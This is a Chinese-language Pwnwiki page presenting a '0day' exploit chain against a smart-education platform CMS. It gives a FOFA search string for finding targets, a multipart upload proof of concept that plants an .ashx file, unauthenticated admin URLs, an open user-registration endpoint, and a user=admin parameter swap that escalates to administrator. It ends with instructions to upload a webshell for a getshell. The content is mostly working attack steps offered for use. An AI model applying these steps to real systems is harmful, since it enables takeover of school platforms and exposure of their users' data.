Pwnwiki: Created page with "==任意用戶註冊漏洞=="

2021-05-26T13:33:18Z

Created page with "==任意用戶註冊漏洞=="

New page

<languages />

==FOFA==
<pre>
"/Widget/common/Service/CommonWidgetService.asmx/Categorylist"
</pre>

[[File:Xnip2021-03-27_21-45-21.jpg | 500px]]

==任意文件上傳漏洞==

<pre>
/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx
</pre>

使用該Payload後返回任意內容即漏洞存在。

===POC===
<pre>
Post:

------WebKitFormBoundaryxJBEcLK1xdylqBhP
Content-Disposition: form-data;name="fileType"

2222.ashx
------WebKitFormBoundaryxJBEcLK1xdylqBhP
Content-Disposition: form-data;name="file"; filename="2222.jpg"
Content-Type: image/jpeg

1
------WebKitFormBoundaryxJBEcLK1xdylqBhP—
</pre>

通過構造的POC成功上傳文件。

==未經授權訪問漏洞==

<pre>
/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
</pre>

直接進入管理員後台，需要登錄的提示綁定賬號，這時候需要註冊一個賬號登錄。

==任意用戶註冊漏洞==

<pre>
Module/SSO/SJS_Register.aspx
</pre>

==漏洞利用==

註冊成功後，登錄到用戶主頁
<pre>
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=test123
</pre>
<div lang="chinese" dir="ltr" class="mw-content-ltr">
修改<code>user=admin</code>，發現界面發生變化，用戶變為管理員
</div>
<pre>
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=admin
</pre>

<div lang="chinese" dir="ltr" class="mw-content-ltr">
進入管理員後台頁面
</div>

<pre>
http://xxx.xxx.xxx/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
</pre>

==Getshell==

<div lang="chinese" dir="ltr" class="mw-content-ltr">
CMS圖片上傳沒有過濾，修改fileType並且上傳Webshell即可。
</div>

智慧教育平台0day/zh-hant - Revision history

Pwnwiki: Created page with "==任意用戶註冊漏洞=="